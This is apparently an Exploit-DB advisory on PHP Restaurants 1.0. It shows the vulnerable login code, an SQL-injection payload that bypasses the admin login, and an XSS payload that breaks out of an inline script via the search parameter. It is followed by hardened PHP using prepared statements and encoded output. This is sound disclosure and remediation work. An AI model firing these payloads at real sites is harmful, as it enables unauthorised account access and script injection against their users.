source link: https://www.exploit-db.com/exploits/51398
PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0
functions.php (vulnerable login function):

function login(){
    global $conn;
    $email = $_POST['email'];
    $pw = $_POST['password'];
    // <-- the POST parameters [email][password] are concatenated straight into the SQL query; there is no filtering or escaping
    $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
            header('location: index.php');
        }
    } else {
        header('location: login.php?m=Wrong Password');
    }
}
Login bypass at the admin page /rest1/admin/login.php
email & password : ' OR 1=1 --  <-- add a [space] at the end of the payload
Cross-site scripting on the main page /index.php (inline script that builds the getRestaurants request):

xhttp.open("GET", "functions.php?f=getRestaurants<?php
    if(isset($_GET['search'])) echo '&search='.$_GET['search']; // <-- the search parameter is echoed here unescaped, so the XSS payload can be inserted at this point
?>
", true);
xhttp.send();
</script> <-- the injection point is inside a <script> block, so when you insert your payload don't forget to start it with </script>, like:

XSS payload : </script><img onerror=alert(1) src=a>
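For reference, the hardened counterparts of the two spots above. This is an added example, not code from the php_restaurants project; it assumes the same mysqli `$conn`, the same `users` table with `email` and `password` columns, and PHP 7.3+ (for the setcookie options array).

```php
<?php
// Added example (not project code). Fixes both findings from the advisory:
// the login query is parameterised, and the search term is encoded before
// it is written into the inline <script> block.

// 1) Login with a prepared statement. Both values are bound as parameters, so
//    an email such as "' OR 1=1 -- " is compared literally and can no longer
//    change the structure of the query.
function login_safe(mysqli $conn): void {
    $email = $_POST['email'] ?? '';
    $pw    = $_POST['password'] ?? '';

    $stmt = $conn->prepare('SELECT `id` FROM `users` WHERE `email` = ? AND `password` = ? LIMIT 1');
    $hash = md5($pw); // kept to match the project's stored hashes; md5 is not a suitable password hash and should be migrated to password_hash()
    $stmt->bind_param('ss', $email, $hash);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    if ($row !== null) {
        // HttpOnly keeps the session cookie out of reach of injected script.
        setcookie('uid', (string)$row['id'], [
            'expires'  => time() + (86400 * 30), // 86400 = 1 day
            'path'     => '/',
            'httponly' => true,
        ]);
        header('Location: index.php');
        exit;
    }
    header('Location: login.php?m=Wrong%20Password');
    exit;
}

// 2) Build the getRestaurants URL server-side. rawurlencode() keeps the search
//    term inside its own query parameter; json_encode() with the HEX flags then
//    emits a JS string literal in which "<", ">", quotes and "&" are escaped,
//    so "</script>" or a quote from the query string cannot break out.
function restaurants_url(?string $search): string {
    $url = 'functions.php?f=getRestaurants';
    if ($search !== null && $search !== '') {
        $url .= '&search=' . rawurlencode($search);
    }
    return $url;
}
?>
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", <?php echo json_encode(restaurants_url($_GET['search'] ?? null), JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT); ?>, true);
xhttp.send();
</script>
```

With the payload from the advisory in `search`, the emitted literal contains `\u003C\/script\u003E...` rather than a raw `</script>`, so the browser never leaves the script context.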